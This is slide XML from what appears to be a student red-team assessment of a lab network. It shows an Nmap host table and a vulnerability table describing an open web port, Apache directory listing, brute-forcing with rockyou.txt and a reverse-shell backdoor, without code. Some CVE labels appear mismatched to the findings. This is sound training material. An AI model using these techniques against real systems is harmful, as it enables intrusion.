                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267BC414-7E97-45B2-B69E-8BA477127D45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457225" y="696326"/>
              <a:ext cx="690207"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mn-lt"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E738B5-B730-4825-AAC9-E31395C224D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634762" y="1255338"/>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descr="Timeline&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C30B7B-23DB-4E9B-9B41-03ACB14883A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="910475"/>
            <a:ext cx="6699600" cy="3897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dirty="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dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6194D6B6-E631-42C9-B0BD-EA76BF7273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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935597426"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="398700" y="1183050"/>
          <a:ext cx="8346600" cy="3698020"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{EB400C15-705A-4B7E-AC61-6032BE286A16}</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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hostname</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>IP Address</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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200" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ML-REFVM-684427 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Hyper-V Azure machine)</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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1(Preferred)</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b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>NATSwitch (Host Machine Cloud based – Hosting the 3 VMs below)</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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali </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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.90</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b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attacking Machine used for penetration testing</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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK</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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.100</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b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Network Monitoring Machine running Kibana – Logs data from Capstone Machine (192.168.1.105)</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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone (server1)</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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.105</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b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Target Machine Replicating a vulnerable server – attempting to pop – hosting an Apache and ssh server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="+mn-lt"/>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711713F4-24B3-4F70-98D5-9ACFFC8102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4" name="Picture 3" descr="A picture containing shape&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36191C3B-7592-430B-8C4F-CCA22CF07ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040295" y="2448335"/>
            <a:ext cx="854765" cy="681668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61BA51D9-8FC4-442D-95A1-4A8D2A111564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5539433" y="110416"/>
            <a:ext cx="622827" cy="533701"/>
            <a:chOff x="1437886" y="695093"/>
            <a:chExt cx="695400" cy="748869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;1032;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F625AD-D3AF-472B-893A-851405BAE659}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1437886" y="69509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mn-lt"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Google Shape;1033;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E36EA1-A695-4E72-B73F-4FB27F967D9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1615423" y="1255337"/>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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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mn-lt"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="696544122"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="328003" y="1095883"/>
          <a:ext cx="8362500" cy="3639020"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{EB400C15-705A-4B7E-AC61-6032BE286A16}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2282676">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2981739">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3098085">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Open Web Port (80) with public access</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CVE-2019-6579</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>j</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="0" i="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r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Port 80 is most commonly used for web communication and if left open and unsecure, it can allow public access.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="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This vulnerability allows access into</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>the web servers. Files and Folders are readily accessible. Sensitive (and secret) files and folders can be found.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="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r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Apache Directory Listing</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CVE-2007-0450</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>k</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                        <a:sym typeface="Arial"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allowed attackers to reveal the ip</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>address and the secret folder</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100"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Allowed attackers to reveal the ip</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>address and the secret folder</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="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r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Brute-force Attack</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i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attack that consists of</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>systematically checking all possible</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>username and password combinations</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>until the correct one is found.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="0"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With the use of brute force and a</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>common passwords list (rockyou.txt),</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>the password can be easily found.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="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CA" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Reverse Shell Backdoor</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CVE-2019-13386</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="0" dirty="0">
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>l</a:t>
                      </a:r>
